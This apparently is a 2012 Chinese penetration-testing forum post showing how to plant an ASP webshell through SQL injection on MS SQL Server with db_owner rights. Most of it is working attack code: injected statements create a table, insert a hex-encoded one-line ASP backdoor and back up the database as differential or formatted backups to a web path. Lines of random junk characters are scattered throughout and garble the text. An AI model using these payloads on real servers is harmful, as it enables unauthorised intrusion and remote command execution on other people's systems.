中国网络渗透测试联盟
标题:
DB_OWNER权限得到webshell的改进办法
[打印本页]
作者:
admin
时间:
2012-11-9 21:31
标题:
DB_OWNER权限得到webshell的改进办法
DB_OWNER权限得到webshell的两点改进:
* ~5 ~: o; }7 g3 s! n0 T
3 o+ Z. C w8 j* E
减少备份文件大小,得到可执行的webshell成功率提高不少
2 s# l# {4 g2 y, \& f7 M
一利用差异备份
6 O1 ]: u" E8 I( O$ ^ S
加一个参数WITH DIFFERENTIAL
. o$ |8 o; k8 M" K
, [" s( G. z" P- [9 [% f" B$ K9 G P
1
; f1 I4 c6 O: q! O
2
# g' d1 r3 S* k
3
8 ^2 ^! O, g4 ?
4
* J) E) z6 O/ _/ b+ t0 T" j4 _
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
+ K- K% b8 C" X. t9 Y+ t
create table [dbo].[xiaolu] ([cmd] [image]);
q5 J f1 H; B9 M5 S. G2 r% I# [: M* X
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
1 F8 R& X8 [, |2 S- E
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
7 A) p8 \) `8 ]! `! C/ h/ ~
5 J' C/ A5 |8 G/ u3 k* b
二利用完全FORMAT
5 S0 F' o$ _0 X9 g3 [5 _" K
加一个参数WITH FROMAT
- {; _9 I, p) K, F
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
. q H. r% J; E( n0 J/ ]
$ d, t4 C, O9 I+ x; A
1
9 P3 b/ S. ^' ]' _; U4 e+ x$ g' Y
2
8 }" D1 a; h4 i4 p3 F& r
3
7 C1 H+ Q; U% e6 q9 @2 @! _
4
% Z4 A6 v& m* E
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
0 ~- f1 Q* |! B: l' b5 F
create table [dbo].[xiaolu] ([cmd] [image]);
2 A6 p6 t: Y" W. j9 R0 l W& g
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
/ C1 z) l+ F% R8 h$ r- p/ y
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
7 M) O1 t+ O. n2 Y6 g' S# S8 A
4 H, L$ n; F i( P9 u0 \; y
总的来说就是那么简单几句,下面以备份数据库model为例子
. @* p8 F* a" E w L R
1
4 ?5 c0 y2 U( f2 ~- i& x( I: D
' S" v( E) ~5 ?: f& c9 P" _7 d
1
I. c% h' C& U) e: i
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
9 G& e3 D+ I# I
, K! s4 @6 Q( v. z; p/ e
2
' T: ^$ O5 t- X7 V$ ?9 j
# {" `( [& o! M
1
2 O3 g" ~! [+ b) {5 G
id=1;backup database model to disk='你的路径‘ with differential,format;--
1 ^, I3 v9 w K: m' J4 f. t
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2